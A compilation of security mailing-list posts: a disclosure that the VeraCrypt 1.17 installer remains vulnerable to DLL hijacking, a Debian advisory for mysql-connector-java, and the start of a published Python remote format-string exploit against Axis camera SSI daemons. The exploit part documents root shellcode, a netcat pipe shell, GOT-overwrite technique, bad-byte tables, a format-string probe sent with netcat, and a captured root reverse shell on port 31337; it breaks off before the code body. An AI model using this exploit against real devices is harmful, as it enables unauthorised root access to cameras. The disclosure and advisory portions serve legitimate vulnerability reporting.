[CVE-2016-1281] NOT FIXED: VeraCrypt*Setup*.exe still vulnerable to DLL hijacking

[Stefan Kanthak]

Hi @ll,

this is basically a followup to 

CVE-2016-1281 is NOT FIXED!

I've retested the current "VeraCrypt Setup 1.17.exe" on a fully
patched Windows 7, and it is STILL (or AGAIN) vulnerable there.

The following DLLs are loaded from the "application directory"
and their DllMain() executed: VSSAPI.dll, ATL.dll, VSSTrace.dll.

See ,
 and
 for details
about this well-known and well-documented beginner's error!

Due to the application manifest embedded in the executable installer
which specifies "requireAdministrator" the installer is run with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of the DLLs therefore results
in an escalation of privilege!

For software downloaded with a web browser the "application
directory" is typically the user's "Downloads" directory: see
,

and  for prior
art!


Mitigation:
~~~

DUMP executable installers, build packages for the target OS' native
installer instead!

See 
as well as  for the long
sad story of these vulnerabilities.


stay tuned
Stefan Kanthak


Timeline:
~

2015-12-23vulnerability report sent to author

2016-01-03author confirmed vulnerability, got CVE-2016-1281

  worked with author until he finally was able to build
  an installer which didn't show this vulnerability.

  Also notified author:
  "as soon as Microsoft introduces new/other dependencies
   between Windows' system DLLs or refactors them (again)
   this vulnerability will VERY likely resurface again."

2016-01-11report published by author (see above)

2016-07-01vulnerability report sent to author ("I told you so!")

  NO RESPONSE

2016-07-17report published

[SECURITY] [DSA 3621-1] mysql-connector-java security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3621-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
July 18, 2016 https://www.debian.org/security/faq
- -

Package: mysql-connector-java
CVE ID : CVE-2015-2575

A vulnerability was discovered in mysql-connector-java, a Java database
(JDBC) driver for MySQL, which may result in unauthorized update, insert
or delete access to some MySQL Connectors accessible data as well as
read access to a subset of MySQL Connectors accessible data. The
vulnerability was addressed by upgrading mysql-connector-java to the new
upstream version 5.1.39, which includes additional changes, such as bug
fixes, new features, and possibly incompatible changes. Please see the
MySQL Connector/J Release Notes and Oracle's Critical Patch Update
advisory for further details:

 https://dev.mysql.com/doc/relnotes/connector-j/5.1/en/news-5-1.html
 
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html#AppendixMSQL

For the stable distribution (jessie), this problem has been fixed in
version 5.1.39-1~deb8u1.

We recommend that you upgrade your mysql-connector-java packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJXjQKkAAoJEAVMuPMTQ89Ee2UP/18I4detSRWBBnIaEGlmIqEw
wTnsJlwtxwCjzDXRL61Vd2MxNbHEGwq8IQi/nWnoNhqRBUXEko5/X72Gx5UFtrMK
5nu1uTZe8xCmFJUaTsvfEb0FtKJ/1I07VHcxgjXJx6J9SXPtal8oKnAQLKfCQAPT
+eFnY8ISjc6xaEYJK/Ddtjt/GXTWPFEvtd4mWH+l19kc2uLwR6RjCgr8NLdsmERv
D5EgTgj5MbnMZPW6SpvcRJj2aWRLqADe9CLxNlw19NNzaXsuZ3Od8IZQ75Nt95CG
RW69EqQTKjblVhvGyb7U13TKqvieM5cqmww2oqt6+4+M/vvJcXctEPT1jBhexJNX
2cy8fzwlI4OMqIrPfJ/SJh7+YQfD9zSLKWuYkVIy+K/39tmIahlLY6TKS8AvIAda
sxDTnvj9dajZEI/DUXdtMoMeqg8hHXs1cYHFFN2uKPLdTTvyAqGQBl9ycf5Njlfa
9rQmdr0UhdP03a5JDSmCBmj+t8iA2hnelV4hg0FtwKUeoguihato8ULOpYQXx1Hg
5AjwBqpNCLBjBVSKzAjJgR9pXO0M3Ibh/dp/55znDMU8evniVVcS8avnePZeIL5V
2suyruiCgLE9CmoWD+p1UzV1qdLHdXnZrZEsUejfX1O0C2u2QdDgHuSF/hCnw1Nj
hEABqqwx0F1UALfdvI0A
=ezgL
-END PGP SIGNATURE-

[Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon

[bashis]

#!/usr/bin/env python2.7
# 
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side 
Include (SSI) Daemon
# Research and development by bashis  2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by 
statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat 
shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous 
(5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
#   - "One-Write-Where-And-What" for MIPS and CRISv32
# Using "Old Style" POP's
# Classic exploit using: Count to free() GOT, write shellcode address, jump 
to shellcode on free() call
# Shellcode loaded in memory by sending shellcode URL encoded, that SSI 
daemon decodes and keeps in memory.
#   - "Two-Write-Where-And-What" for ARM
# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() 
target address
# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New 
Style" (<5.40.x) direct parameter access for POP/Write
# [Big differnce in possibilities between "Old Style" and "New Style", 
pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte 
(One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?_user=%p|%p HTTP/1.0\n\n" | netcat 
192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# 500 Server Error
# 500 Server Error
# The server encountered an internal error and could not complete your request.
# 
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
#  Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() 
failed for user: 0x961f0|0x3ac04b10
#  Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get 
authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis 
Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1.  Direct addressing with %$%n is "delayed", and comes in force 
only after disconnect.
# Old metod with POP's coming into force instantly
#
# 2.  Argument "0" will be assigned (after using old POP metod and %n WRITE) 
the next address on stack after POP's)
# - Would be interesting to investigate why.
#
# 3.  Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 
0x26
# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4.  Everything is randomized, except heap.
#
# 5.  My initial attempts to use ROP's was not good, as I didn't want to create
# one unique FMS key by testing each single firmware version, and using ROP 
with FMS
# on heap seems pretty complicated as there is one jump availible, maximum 
two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best 
technique in this case.
#
# 6.  Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7.  Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their 
binaries/libs,
# so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack 
flag bit on binaries,
# and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the 
builtin '/bin/sh -c' code to execute.
#
# 8.  This exploit are pretty well documented, more details can be extracted by 
reading
# the code and comments.
#
# MIPS ssid maps
# 0040-0040d000